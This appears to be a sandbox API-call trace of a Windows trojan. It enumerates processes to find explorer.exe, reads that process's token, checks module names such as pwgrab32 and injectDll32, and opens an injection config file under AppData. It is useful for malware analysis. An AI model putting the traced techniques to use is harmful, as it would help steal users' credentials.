	[0234.513] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0234.514] lstrcmpW (lpString1="explorer.exe", lpString2="System") returned -1
	[0234.514] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0234.515] lstrcmpW (lpString1="explorer.exe", lpString2="smss.exe") returned -1
	[0234.515] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0234.517] lstrcmpW (lpString1="explorer.exe", lpString2="csrss.exe") returned 1
	[0234.517] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0234.519] lstrcmpW (lpString1="explorer.exe", lpString2="wininit.exe") returned -1
	[0234.519] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0234.520] lstrcmpW (lpString1="explorer.exe", lpString2="csrss.exe") returned 1
	[0234.520] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0234.521] lstrcmpW (lpString1="explorer.exe", lpString2="winlogon.exe") returned -1
	[0234.521] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0234.523] lstrcmpW (lpString1="explorer.exe", lpString2="services.exe") returned -1
	[0234.523] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0234.524] lstrcmpW (lpString1="explorer.exe", lpString2="lsass.exe") returned -1
	[0234.524] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0234.526] lstrcmpW (lpString1="explorer.exe", lpString2="lsm.exe") returned -1
	[0234.526] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.527] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0234.527] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.528] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0234.528] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.529] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0234.529] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.530] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0234.530] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.531] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0234.531] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.532] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0234.532] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.533] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0234.533] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0234.534] lstrcmpW (lpString1="explorer.exe", lpString2="spoolsv.exe") returned -1
	[0234.534] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.535] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0234.535] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0234.535] lstrcmpW (lpString1="explorer.exe", lpString2="taskhost.exe") returned -1
	[0234.535] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0234.536] lstrcmpW (lpString1="explorer.exe", lpString2="taskeng.exe") returned -1
	[0234.536] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.537] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0234.537] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0234.538] lstrcmpW (lpString1="explorer.exe", lpString2="WmiPrvSE.exe") returned -1
	[0234.538] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0234.539] lstrcmpW (lpString1="explorer.exe", lpString2="sppsvc.exe") returned -1
	[0234.539] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0234.540] lstrcmpW (lpString1="explorer.exe", lpString2="dwm.exe") returned 1
	[0234.540] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0234.541] lstrcmpW (lpString1="explorer.exe", lpString2="explorer.exe") returned 0
	[0234.541] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0234.542] lstrcmpW (lpString1="explorer.exe", lpString2="audiodg.exe") returned 1
	[0234.542] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0234.542] lstrcmpW (lpString1="explorer.exe", lpString2="shirts_cumshots_compaq.exe") returned -1
	[0234.542] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0234.543] lstrcmpW (lpString1="explorer.exe", lpString2="league.exe") returned -1
	[0234.543] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0234.544] lstrcmpW (lpString1="explorer.exe", lpString2="js_sound.exe") returned -1
	[0234.544] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0234.545] lstrcmpW (lpString1="explorer.exe", lpString2="beast-dry.exe") returned 1
	[0234.545] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0234.546] lstrcmpW (lpString1="explorer.exe", lpString2="forecastsgeographic.exe") returned -1
	[0234.546] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0234.547] lstrcmpW (lpString1="explorer.exe", lpString2="reno.exe") returned -1
	[0234.547] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0234.610] lstrcmpW (lpString1="explorer.exe", lpString2="specreformwear.exe") returned -1
	[0234.610] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0234.611] lstrcmpW (lpString1="explorer.exe", lpString2="rr_publications.exe") returned -1
	[0234.611] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0234.612] lstrcmpW (lpString1="explorer.exe", lpString2="solo.exe") returned -1
	[0234.612] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0234.613] lstrcmpW (lpString1="explorer.exe", lpString2="beam.exe") returned 1
	[0234.613] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0234.614] lstrcmpW (lpString1="explorer.exe", lpString2="configurations.exe") returned 1
	[0234.614] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0234.615] lstrcmpW (lpString1="explorer.exe", lpString2="fact-film-anticipated.exe") returned -1
	[0234.615] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0234.616] lstrcmpW (lpString1="explorer.exe", lpString2="wanting villages.exe") returned -1
	[0234.616] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0234.616] lstrcmpW (lpString1="explorer.exe", lpString2="engagementresearchersmonkey.exe") returned 1
	[0234.617] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0234.617] lstrcmpW (lpString1="explorer.exe", lpString2="surgical-marcus.exe") returned -1
	[0234.617] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0234.618] lstrcmpW (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1
	[0234.621] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0234.621] lstrcmpW (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1
	[0234.621] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0234.622] lstrcmpW (lpString1="explorer.exe", lpString2="taskeng.exe") returned -1
	[0234.622] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0234.623] lstrcmpW (lpString1="explorer.exe", lpString2="tadiapce.exe") returned -1
	[0234.623] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.624] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0234.624] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.625] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0234.625] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.626] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0234.626] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.627] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0234.627] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0234.628] lstrcmpW (lpString1="explorer.exe", lpString2="WmiPrvSE.exe") returned -1
	[0234.628] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0234.629] lstrcmpW (lpString1="explorer.exe", lpString2="dllhost.exe") returned 1
	[0234.629] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.630] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0234.630] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.631] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0234.631] Process32NextW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0234.632] CloseHandle (hObject=0x600) returned 1
	[0234.632] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b7548
	[0234.632] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b7500
	[0234.632] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311b58
	[0234.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x61c) returned 0x600
	[0234.632] OpenProcessToken (in: ProcessHandle=0x600, DesiredAccess=0x8, TokenHandle=0x128c8c | out: TokenHandle=0x128c8c*=0x688) returned 1
	[0234.632] GetTokenInformation (in: TokenHandle=0x688, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x128c98 | out: TokenInformation=0x0, ReturnLength=0x128c98) returned 0
	[0234.632] GetLastError () returned 0x7a
	[0234.632] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6570
	[0234.632] GetTokenInformation (in: TokenHandle=0x688, TokenInformationClass=0x1, TokenInformation=0x22a6570, TokenInformationLength=0x24, ReturnLength=0x128c98 | out: TokenInformation=0x22a6570, ReturnLength=0x128c98) returned 1
	[0234.632] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x22a6578*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xb)), Name=0x128cb0, cchName=0x128c84, ReferencedDomainName=0x128a7c, cchReferencedDomainName=0x128c80, peUse=0x128c7c | out: Name="2XC7u663GxWc", cchName=0x128c84, ReferencedDomainName="ZGW5TDPU", cchReferencedDomainName=0x128c80, peUse=0x128c7c) returned 1
	[0234.633] CloseHandle (hObject=0x688) returned 1
	[0234.633] CloseHandle (hObject=0x600) returned 1
	[0234.633] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27befa0
	[0234.633] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b7548) returned 1
	[0234.633] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27befc8
	[0234.633] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b7548
	[0234.633] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311c60
	[0234.633] lstrcmpiW (lpString1="injectDll32", lpString2="pwgrab32") returned -1
	[0234.633] lstrcmpiW (lpString1="pwgrab32", lpString2="pwgrab32") returned 0
	[0234.633] lstrcmpiW (lpString1="networkDll32", lpString2="pwgrab32") returned -1
	[0234.633] lstrcmpiW (lpString1="psfin32", lpString2="pwgrab32") returned -1
	[0234.633] lstrcmpiW (lpString1="shareDll32", lpString2="pwgrab32") returned 1
	[0234.633] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27befc8) returned 1
	[0234.633] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311c60) returned 1
	[0234.633] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b7548) returned 1
	[0234.633] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b7500) returned 1
	[0234.633] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x2255b0
	[0234.633] GetExitCodeThread (in: hThread=0x13c, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0234.633] GetExitCodeThread (in: hThread=0x140, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0234.633] GetExitCodeThread (in: hThread=0x578, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0234.633] GetExitCodeThread (in: hThread=0x628, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0234.633] GetExitCodeThread (in: hThread=0x5e4, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0234.633] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2255b0) returned 1
	[0234.633] Sleep (dwMilliseconds=0x4e20) 
	[0234.675] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294f4 | out: lpSystemTimeAsFileTime=0x1294f4*(dwLowDateTime=0x73b85100, dwHighDateTime=0x1d50a6a)) 
	[0234.675] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0234.675] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\dinj" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\dinj"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6d0
	[0234.675] GetFileTime (in: hFile=0x6d0, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a)) returned 1
	[0234.675] CloseHandle (hObject=0x6d0) returned 1
	[0234.675] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x73b85100, dwHighDateTime=0x1d50a6a)) 
